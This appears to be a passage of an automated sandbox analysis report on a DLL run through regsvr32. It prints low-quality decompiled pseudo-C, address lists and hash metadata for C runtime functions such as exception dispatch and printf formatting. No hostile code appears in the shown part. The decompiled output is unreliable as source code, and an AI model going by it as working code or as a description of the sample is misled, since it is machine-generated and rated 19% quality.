				E000007FE7FEF9D2E6A0(_v104 - 1, _t332);
				_v88 = _t332 +  *_v96;
				if (E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))) != 0) goto 0xf9d345ce;
				goto 0xf9d3455a;
				_v152 = 1;
				_v176 = _a48 & 0x000000ff;
				_v184 = _v164 & 0x000000ff;
				_v192 = _a64;
				_v200 = _a56;
				_v208 = _v128;
				_v216 = _v88;
				_v224 = _v112;
				_v232 = _a40;
				E000007FE7FEF9D35180(__edi, __esi, __esp, E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))), _a8, _a16, _a24, _a32);
				goto 0xf9d34667;
				goto 0xf9d3455a;
				goto L1;
				goto 0xf9d3445a;
				__eax = _v152 & 0x000000ff;
				__eflags = _v152 & 0x000000ff;
				if ((_v152 & 0x000000ff) != 0) goto 0xf9d347d7;
				__rax = _a40;
				__eax =  *_a40;
				__eax =  *_a40 & 0x1fffffff;
				__eflags = __eax - 0x19930521;
				if (__eax - 0x19930521 < 0) goto 0xf9d347d7;
				__rax = _a40;
				__eflags =  *(__rax + 0x20);
				if ( *(__rax + 0x20) == 0) goto 0xf9d346bf;
				__eax = E000007FE7FEF9D2E680(__eax, __rax);
				_a40 = _a40[8];
				_v32 = __rax;
				goto 0xf9d346cb;
				_v32 = 0;
				__eflags = _v32;
				if (_v32 == 0) goto 0xf9d347d7;
				__rax = _a40;
				__eflags =  *(__rax + 0x20);
				if ( *(__rax + 0x20) == 0) goto 0xf9d34706;
				__eax = E000007FE7FEF9D2E680(__eax, __rax);
				_a40 = _a40[8];
				__rax = __rax + _a40[8];
				_v24 = __rax;
				goto 0xf9d34712;
				_v24 = 0;
				__rdx = _v24;
				__rcx = _a8;
				E000007FE7FEF9D35BB0(__rax, _a8, _v24) = __al & 0x000000ff;
				__eflags = __al & 0x000000ff;
				if ((__al & 0x000000ff) != 0) goto 0xf9d347d7;
				__rax = _a16;
				_v64 = _a16;
				__r9 =  &_v80;
				__r8 = _a40;
				__rdx = _a32;
				__rcx = _a16;
				__eax = E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v80);
				_v64 = __rax;
				_v72 = 0;
				__eax = _a48 & 0x000000ff;
				_v200 = __al;
				__rax = _a32;
				_v208 = _a32;
				__rax = _a40;
				_v216 = _a40;
				_v224 = 0xffffffff;
				_v232 = 0;
				__r9 = _v64;
				__r8 = _a24;
				__rdx = _a8;
				__rcx = _a16;
				__eax = E000007FE7FEF9D2EDC0(__edi, __esi, __esp, _a16, _a8, _a24, _v64);
				goto 0xf9d3484c;
				__rax = _a40;
				__eflags =  *(__rax + 0xc);
				if ( *(__rax + 0xc) <= 0) goto 0xf9d3484c;
				__eax = _a48 & 0x000000ff;
				__eflags = _a48 & 0x000000ff;
				if ((_a48 & 0x000000ff) != 0) goto 0xf9d34847;
				__rax = _a64;
				_v208 = _a64;
				__eax = _a56;
				_v216 = _a56;
				__eax = _v168;
				_v224 = _v168;
				__rax = _a40;
				_v232 = _a40;
				__r9 = _a32;
				__r8 = _a24;
				__rdx = _a16;
				__rcx = _a8;
				__eax = E000007FE7FEF9D34960(__ecx, _a8, _a16, _a24, _a32);
				goto 0xf9d3484c;
				__eax = E000007FE7FEF9D2CF50(__rax);
				0xf9d24000();
				__eflags =  *((long long*)(__rax + 0x108));
				if ( *((long long*)(__rax + 0x108)) != 0) goto 0xf9d3485d;
				goto 0xf9d34862;
				return E000007FE7FEF9D2CF80(__rax);
			}










































                                0x7fef9d340b0
                                0x7fef9d340b0
                                0x7fef9d340b5
                                0x7fef9d340ba
                                0x7fef9d340bf
                                0x7fef9d340cb
                                0x7fef9d340d0
                                0x7fef9d340ea
                                0x7fef9d3410b
                                0x7fef9d34131
                                0x7fef9d34133
                                0x7fef9d3414d
                                0x7fef9d34152
                                0x7fef9d3416f
                                0x7fef9d34174
                                0x7fef9d34193
                                0x7fef9d3419c
                                0x7fef9d341ad
                                0x7fef9d341af
                                0x7fef9d341b1
                                0x7fef9d341c4
                                0x7fef9d341d6
                                0x7fef9d341eb
                                0x7fef9d341fc
                                0x7fef9d3420d
                                0x7fef9d34213
                                0x7fef9d34220
                                0x7fef9d34226
                                0x7fef9d34233
                                0x7fef9d34235
                                0x7fef9d3423a
                                0x7fef9d3423f
                                0x7fef9d34246
                                0x7fef9d3424e
                                0x7fef9d3425a
                                0x7fef9d34262
                                0x7fef9d34273
                                0x7fef9d3428c
                                0x7fef9d3428e
                                0x7fef9d34290
                                0x7fef9d342a3
                                0x7fef9d342b1
                                0x7fef9d342c2
                                0x7fef9d342d3
                                0x7fef9d342e4
                                0x7fef9d342e6
                                0x7fef9d342f3
                                0x7fef9d342f5
                                0x7fef9d342fa
                                0x7fef9d34307
                                0x7fef9d3430d
                                0x7fef9d34312
                                0x7fef9d34319
                                0x7fef9d3431e
                                0x7fef9d34323
                                0x7fef9d34345
                                0x7fef9d34347
                                0x7fef9d34358
                                0x7fef9d34364
                                0x7fef9d34378
                                0x7fef9d3438c
                                0x7fef9d34391
                                0x7fef9d34393
                                0x7fef9d343a6
                                0x7fef9d343b8
                                0x7fef9d343cd
                                0x7fef9d343de
                                0x7fef9d343ef
                                0x7fef9d34401
                                0x7fef9d3440f
                                0x7fef9d3441c
                                0x7fef9d34421
                                0x7fef9d34429
                                0x7fef9d3442e
                                0x7fef9d34433
                                0x7fef9d3444b
                                0x7fef9d34450
                                0x7fef9d34458
                                0x7fef9d34463
                                0x7fef9d34476
                                0x7fef9d3448c
                                0x7fef9d344a0
                                0x7fef9d344a2
                                0x7fef9d344b1
                                0x7fef9d344b3
                                0x7fef9d344b5
                                0x7fef9d344c9
                                0x7fef9d344dc
                                0x7fef9d344ee
                                0x7fef9d344fd
                                0x7fef9d34501
                                0x7fef9d34511
                                0x7fef9d34517
                                0x7fef9d3452c
                                0x7fef9d34531
                                0x7fef9d34539
                                0x7fef9d34551
                                0x7fef9d34558
                                0x7fef9d34563
                                0x7fef9d34572
                                0x7fef9d34576
                                0x7fef9d34586
                                0x7fef9d3458c
                                0x7fef9d3459f
                                0x7fef9d345ca
                                0x7fef9d345cc
                                0x7fef9d345ce
                                0x7fef9d345db
                                0x7fef9d345e4
                                0x7fef9d345f0
                                0x7fef9d345fc
                                0x7fef9d34608
                                0x7fef9d34615
                                0x7fef9d34622
                                0x7fef9d3462f
                                0x7fef9d34654
                                0x7fef9d3465b
                                0x7fef9d3465d
                                0x7fef9d34662
                                0x7fef9d34667
                                0x7fef9d3466c
                                0x7fef9d34671
                                0x7fef9d34673
                                0x7fef9d34679
                                0x7fef9d34681
                                0x7fef9d34683
                                0x7fef9d34688
                                0x7fef9d3468d
                                0x7fef9d34693
                                0x7fef9d3469b
                                0x7fef9d3469f
                                0x7fef9d346a1
                                0x7fef9d346ae
                                0x7fef9d346b5
                                0x7fef9d346bd
                                0x7fef9d346bf
                                0x7fef9d346cb
                                0x7fef9d346d4
                                0x7fef9d346da
                                0x7fef9d346e2
                                0x7fef9d346e6
                                0x7fef9d346e8
                                0x7fef9d346f5
                                0x7fef9d346f9
                                0x7fef9d346fc
                                0x7fef9d34704
                                0x7fef9d34706
                                0x7fef9d34712
                                0x7fef9d3471a
                                0x7fef9d34727
                                0x7fef9d3472a
                                0x7fef9d3472c
                                0x7fef9d34732
                                0x7fef9d3473a
                                0x7fef9d34742
                                0x7fef9d3474a
                                0x7fef9d34752
                                0x7fef9d3475a
                                0x7fef9d34762
                                0x7fef9d34767
                                0x7fef9d3476f
                                0x7fef9d3477b
                                0x7fef9d34783
                                0x7fef9d34787
                                0x7fef9d3478f
                                0x7fef9d34794
                                0x7fef9d3479c
                                0x7fef9d347a1
                                0x7fef9d347a9
                                0x7fef9d347b2
                                0x7fef9d347ba
                                0x7fef9d347c2
                                0x7fef9d347ca
                                0x7fef9d347d2
                                0x7fef9d347d7
                                0x7fef9d347d9
                                0x7fef9d347e1
                                0x7fef9d347e5
                                0x7fef9d347e7
                                0x7fef9d347ef
                                0x7fef9d347f1
                                0x7fef9d347f3
                                0x7fef9d347fb
                                0x7fef9d34800
                                0x7fef9d34807
                                0x7fef9d3480b
                                0x7fef9d3480f
                                0x7fef9d34813
                                0x7fef9d3481b
                                0x7fef9d34820
                                0x7fef9d34828
                                0x7fef9d34830
                                0x7fef9d34838
                                0x7fef9d34840
                                0x7fef9d34845
                                0x7fef9d34847
                                0x7fef9d3484c
                                0x7fef9d34851
                                0x7fef9d34859
                                0x7fef9d3485b
                                0x7fef9d34869

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: BlockStateUnwind_inconsistency$ControlFromterminate$BaseDecodeEntryExceptionFunctionImageLookupPointerRaiseReadThrowValidatestd::bad_exception::bad_exceptionstd::exception::exceptiontype_info::operator==
                                • String ID: bad exception$csm$csm$csm
                                • API String ID: 3498492519-820278400
                                • Opcode ID: 8c50efc0869d6d00d6f15bc2f3e4a8aa3cd75fee2d20c8f1ee388d100984527e
                                • Instruction ID: 7a4295b2110f602878fc3b4740f95154d7254c41b9f584a981bc20edbc55875e
                                • Opcode Fuzzy Hash: 8c50efc0869d6d00d6f15bc2f3e4a8aa3cd75fee2d20c8f1ee388d100984527e
                                • Instruction Fuzzy Hash: 6D12D436A0DBC585DAB19B15E8407EEB7A0F7C8791F604126DACD87BA9CB7DD440CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3B580 Relevance: 31.8, APIs: 11, Strings: 7, Instructions: 318COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$_invalid_parameter$UpdateUpdate::~_
                                • String ID: ( (_Stream->_flag & _IOSTRG) || ( fn = _fileno(_Stream), ( (_textmode_safe(fn) == __IOINFO_TM_ANSI) && !_tm_unicode_safe(fn))))$("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 4023976971-2293733425
                                • Opcode ID: 2e8f2817575abf17236a5f031f9d249ff9066c6c73ed3770e2a1ff63e1bea630
                                • Instruction ID: 2efa9e2c76ac9a5207add94b1133c9cb1d9f002e85ba24f4cd28f4c384247538
                                • Opcode Fuzzy Hash: 2e8f2817575abf17236a5f031f9d249ff9066c6c73ed3770e2a1ff63e1bea630
                                • Instruction Fuzzy Hash: 62023B72A0D7C28AE7B09B24E8447AEB7E4F380349F604125D6DC46AA9DB7EE545CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D35EA0 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 256COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                • String ID: _mbstowcs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$s != NULL
                                • API String ID: 530996419-3695252689
                                • Opcode ID: fa484580cb52892c02ff67f95a17d1b2129cff6d1ab00e5c74c45926566419d1
                                • Instruction ID: 5e2c1cfd74ac96a9b2e41df821e9bd095c4032b9a62c445e43c495128706d0cc
                                • Opcode Fuzzy Hash: fa484580cb52892c02ff67f95a17d1b2129cff6d1ab00e5c74c45926566419d1
                                • Instruction Fuzzy Hash: E2D11832A1CBC585E7A09B15E8407AEB7A0F784794F605626E6DE83BE9DF3DD444CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3B090 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 219COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: "$"$("Buffer too small", 0)$_wctomb_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wctomb.c$sizeInBytes <= INT_MAX$sizeInBytes > 0
                                • API String ID: 2192614184-1854130327
                                • Opcode ID: 0349e1f67bcf58a9467b2163a48374e143b216b4fcd3e10d2347f4427f3577c7
                                • Instruction ID: 857da3831ea488476c5fe61a9777edcdb3204cdfae2c6516af70c38e8266575f
                                • Opcode Fuzzy Hash: 0349e1f67bcf58a9467b2163a48374e143b216b4fcd3e10d2347f4427f3577c7
                                • Instruction Fuzzy Hash: 97C1F932A0D68286E7B09B55E8547BEB7E0F784344F604126E6CD87AE9CB7EE444CF41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3D830 Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 225COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2192614184-1870338870
                                • Opcode ID: 677b85930a9a5e10114940793937fb41496cbdaf58dc4485b8ee00e4ca785de0
                                • Instruction ID: 99087f23451225b4f7ab5820d3e4ac0e5e7a5016f389c9197bb40e17ebc05c44
                                • Opcode Fuzzy Hash: 677b85930a9a5e10114940793937fb41496cbdaf58dc4485b8ee00e4ca785de0
                                • Instruction Fuzzy Hash: 4ED11972A0CAC28AE7B09F64E8447AEB6E0F380349F604125D6CD47AE9DB7ED545CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3C6D6 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 332COMMON
                                Download Yara Rule
                                C-Code - Quality: 19%
                                			E000007FE7FEF9D3C6D6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
				signed int _t223;
				signed char _t228;
				intOrPtr _t263;
				signed int _t338;
				signed int _t339;
				signed long long _t342;
				intOrPtr* _t365;
				signed long long _t390;

				_t338 = __rax;
				_a80 = _a80 | 0x00000040;
				_a72 = 0xa;
				_a72 = 0xa;
				_a116 = 0x10;
				asm("bts eax, 0xf");
				_a708 = 7;
				_a708 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
				_a84 = 0x30;
				_a85 = _a708 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t338;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t338;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
				_t339 = E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t339;
				goto 0xf9d3c80e;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t339;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t339;
				goto 0xf9d3c84b;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t339;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
				if (_a824 >= 0) goto 0xf9d3c882;
				_a832 =  ~_a824;
				asm("bts eax, 0x8");
				goto 0xf9d3c892;
				_t342 = _a824;
				_a832 = _t342;
				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
				_a832 = _a832 & _t342;
				if (_a116 >= 0) goto 0xf9d3c8d8;
				_a116 = 1;
				goto 0xf9d3c8f5;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
				_a116 = 0x200;
				if (_a832 != 0) goto 0xf9d3c908;
				_a92 = 0;
				_a64 =  &_a687;
				_t223 = _a116;
				_a116 = _a116 - 1;
				if (_t223 > 0) goto 0xf9d3c936;
				if (_a832 == 0) goto 0xf9d3c9d3;
				_a1040 = _a72;
				_a816 = _t223 / _a1040 + 0x30;
				_a1048 = _a72;
				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
				_t228 = _a816 + _a708;
				_a816 = _t228;
				 *_a64 = _a816 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0xf9d3c915;
				_a104 = _t228;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
				if (_a104 == 0) goto 0xf9d3ca12;
				if ( *_a64 == 0x30) goto 0xf9d3ca31;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
				_a84 = 0x20;
				_a92 = 1;
				_a840 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
				if (_a76 == 0) goto 0xf9d3cc1d;
				if (_a104 <= 0) goto 0xf9d3cc1d;
				_a872 = 0;
				_a848 = _a64;
				_a856 = _a104;
				_a856 = _a856 - 1;
				if (_a856 == 0) goto 0xf9d3cc1b;
				_a1056 =  *_a848 & 0x0000ffff;
				r9d = _a1056 & 0x0000ffff;
				r8d = 6;
				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
				_a848 =  &(_a848[1]);
				if (_a872 != 0) goto 0xf9d3cbe5;
				if (_a860 != 0) goto 0xf9d3cbf2;
				_a688 = 0xffffffff;
				goto 0xf9d3cc1b;
				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
				goto 0xf9d3cb60;
				goto 0xf9d3cc3b;
				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
				if (_a688 < 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				if (_a96 == 0) goto 0xf9d3cc8e;
				0xf9d25330();
				_a96 = 0;
				goto 0xf9d3b99c;
				if (_a704 == 0) goto 0xf9d3ccb4;
				if (_a704 == 7) goto 0xf9d3ccb4;
				_a1060 = 0;
				goto 0xf9d3ccbf;
				_a1060 = 1;
				_t263 = _a1060;
				_a876 = _t263;
				if (_a876 != 0) goto 0xf9d3cd05;
				_t365 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t365;
				r9d = 0;
				r8d = 0x8f5;
				0xf9d2b3b0();
				if (_t263 != 1) goto 0xf9d3cd05;
				asm("int3");
				if (_a876 != 0) goto 0xf9d3cd61;
				0xf9d2ab30();
				 *_t365 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a912 = 0xffffffff;
				E000007FE7FEF9D26800( &_a120);
				goto 0xf9d3cd80;
				_a916 = _a688;
				E000007FE7FEF9D26800( &_a120);
				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t390, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}











                                0x7fef9d3c6d6
                                0x7fef9d3c6dd
                                0x7fef9d3c6e1
                                0x7fef9d3c6ee
                                0x7fef9d3c6f8
                                0x7fef9d3c704
                                0x7fef9d3c70c
                                0x7fef9d3c719
                                0x7fef9d3c724
                                0x7fef9d3c737
                                0x7fef9d3c739
                                0x7fef9d3c748
                                0x7fef9d3c74c
                                0x7fef9d3c756
                                0x7fef9d3c769
                                0x7fef9d3c76f
                                0x7fef9d3c782
                                0x7fef9d3c78c
                                0x7fef9d3c791
                                0x7fef9d3c799
                                0x7fef9d3c7a9
                                0x7fef9d3c7b3
                                0x7fef9d3c7b8
                                0x7fef9d3c7c0
                                0x7fef9d3c7ce
                                0x7fef9d3c7d9
                                0x7fef9d3c7e8
                                0x7fef9d3c7ec
                                0x7fef9d3c7f4
                                0x7fef9d3c7fe
                                0x7fef9d3c806
                                0x7fef9d3c80e
                                0x7fef9d3c819
                                0x7fef9d3c823
                                0x7fef9d3c82a
                                0x7fef9d3c832
                                0x7fef9d3c83c
                                0x7fef9d3c843
                                0x7fef9d3c854
                                0x7fef9d3c85f
                                0x7fef9d3c86c
                                0x7fef9d3c878
                                0x7fef9d3c880
                                0x7fef9d3c882
                                0x7fef9d3c88a
                                0x7fef9d3c89d
                                0x7fef9d3c8aa
                                0x7fef9d3c8bf
                                0x7fef9d3c8cc
                                0x7fef9d3c8ce
                                0x7fef9d3c8d6
                                0x7fef9d3c8df
                                0x7fef9d3c8eb
                                0x7fef9d3c8ed
                                0x7fef9d3c8fe
                                0x7fef9d3c900
                                0x7fef9d3c910
                                0x7fef9d3c915
                                0x7fef9d3c91f
                                0x7fef9d3c925
                                0x7fef9d3c930
                                0x7fef9d3c93b
                                0x7fef9d3c95e
                                0x7fef9d3c96a
                                0x7fef9d3c997
                                0x7fef9d3c9a9
                                0x7fef9d3c9ab
                                0x7fef9d3c9bf
                                0x7fef9d3c9c9
                                0x7fef9d3c9ce
                                0x7fef9d3c9e0
                                0x7fef9d3c9ec
                                0x7fef9d3c9fc
                                0x7fef9d3ca03
                                0x7fef9d3ca10
                                0x7fef9d3ca1a
                                0x7fef9d3ca24
                                0x7fef9d3ca2d
                                0x7fef9d3ca36
                                0x7fef9d3ca45
                                0x7fef9d3ca52
                                0x7fef9d3ca54
                                0x7fef9d3ca59
                                0x7fef9d3ca61
                                0x7fef9d3ca6c
                                0x7fef9d3ca6e
                                0x7fef9d3ca73
                                0x7fef9d3ca7b
                                0x7fef9d3ca86
                                0x7fef9d3ca88
                                0x7fef9d3ca8d
                                0x7fef9d3caa5
                                0x7fef9d3cab5
                                0x7fef9d3cad0
                                0x7fef9d3caee
                                0x7fef9d3cafc
                                0x7fef9d3cb07
                                0x7fef9d3cb22
                                0x7fef9d3cb2c
                                0x7fef9d3cb37
                                0x7fef9d3cb3d
                                0x7fef9d3cb4d
                                0x7fef9d3cb59
                                0x7fef9d3cb70
                                0x7fef9d3cb79
                                0x7fef9d3cb8a
                                0x7fef9d3cb92
                                0x7fef9d3cb9b
                                0x7fef9d3cbb6
                                0x7fef9d3cbc9
                                0x7fef9d3cbd9
                                0x7fef9d3cbe3
                                0x7fef9d3cbe5
                                0x7fef9d3cbf0
                                0x7fef9d3cc11
                                0x7fef9d3cc16
                                0x7fef9d3cc1b
                                0x7fef9d3cc36
                                0x7fef9d3cc43
                                0x7fef9d3cc4e
                                0x7fef9d3cc69
                                0x7fef9d3cc74
                                0x7fef9d3cc80
                                0x7fef9d3cc85
                                0x7fef9d3cc8e
                                0x7fef9d3cc9b
                                0x7fef9d3cca5
                                0x7fef9d3cca7
                                0x7fef9d3ccb2
                                0x7fef9d3ccb4
                                0x7fef9d3ccbf
                                0x7fef9d3ccc6
                                0x7fef9d3ccd5
                                0x7fef9d3ccd7
                                0x7fef9d3ccde
                                0x7fef9d3cce3
                                0x7fef9d3cce6
                                0x7fef9d3ccf8
                                0x7fef9d3cd00
                                0x7fef9d3cd02
                                0x7fef9d3cd0d
                                0x7fef9d3cd0f
                                0x7fef9d3cd14
                                0x7fef9d3cd1a
                                0x7fef9d3cd23
                                0x7fef9d3cd3e
                                0x7fef9d3cd43
                                0x7fef9d3cd53
                                0x7fef9d3cd5f
                                0x7fef9d3cd68
                                0x7fef9d3cd74
                                0x7fef9d3cd97

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: get_int64_arg$wctomb_s
                                • String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2984758162-268265396
                                • Opcode ID: 61945b808d8ddeeab049de188114ad7d55d89a3558f0f9168201042d10a77149
                                • Instruction ID: 3d46b7cc479ec5e1b64121366563b1e191facb976c601abf34f32c88bb47aca1
